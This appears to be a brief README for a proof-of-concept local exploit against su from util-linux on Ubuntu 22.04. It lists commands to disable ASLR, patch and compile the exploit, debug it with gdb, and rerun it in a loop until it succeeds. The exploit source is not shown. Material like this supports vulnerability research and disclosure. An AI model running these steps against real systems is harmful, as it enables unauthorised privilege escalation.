Proof-of-Concept
Developed for:
- Ubuntu 22.04
- Ubuntu GLIBC 2.35-0ubuntu3.1
- su from util-linux 2.37.2
- ASLR ON
Dockerfile included.
Disable ASLR
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Compile with NO_ASLR
$ python3 patch.py
$ gcc poc.c -o poc_debug -DNO_ASLR
Run gdbscript
gdb -ix gdbscript
$ python3 patch.py
$ gcc poc.c -o poc
./poc; while [ $? -ne 0 ]; do ./poc; done